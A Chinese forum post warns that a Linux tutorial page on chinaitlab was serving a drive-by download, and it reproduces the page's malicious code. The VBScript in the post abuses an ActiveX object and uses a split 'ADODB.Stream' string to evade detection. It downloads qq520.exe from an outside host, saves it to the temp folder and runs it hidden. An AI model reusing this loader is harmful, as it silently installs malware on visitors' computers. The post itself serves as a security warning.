为了避免大家直接点击进去了,我把网址最后的一个l去掉了
http://linux.chinaitlab.com/kernel/398660.htm +l
刚才找linux资料访问到这个页面时,Norton报警了,用wiinsock expert分析了下,下回来http://www.zn360.com/tt/ufo.ht(我把网址后的m去掉了)
一看代码,原来是这样的
[code]
from:http://linux.chinaitlab.com/kernel/398660.html
<html>
<script language="VBScript">
on error resume next
dl = "http://www.zn360.com/tt/qq520.exe"
Set df = document.createElement("object")
df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
str="Microsoft.XMLHTTP"
Set x = df.CreateObject(str,"")
a1="Ado"
a2="db."
a3="Str"
a4="eam"
str1=a1&a2&a3&a4
str5=str1
set S = df.createobject(str5,"")
S.type = 1
str6="GET"
x.Open str6, dl, False
x.Send
fname1="g0ld.com"
set F = df.createobject("Scripting.FileSystemObject","")
set tmp = F.GetSpecialFolder(2)
S.open
fname1= F.BuildPath(tmp,fname1)
S.write x.responseBody
S.savetofile fname1,2
S.close
set Q = df.createobject("Shell.Application","")
Q.ShellExecute fname1,"","","open",0
</script>
<head>
<title>Oh,my god!</title>
</head><body>
<center>You DO it!</center>
</body></html>
[/code]
faint,想不到chanaitlab也挂马(当然,不排除是广告商的页面有马),但无论如何,罪不可卸!
唉,常在网上走,千万要小心了!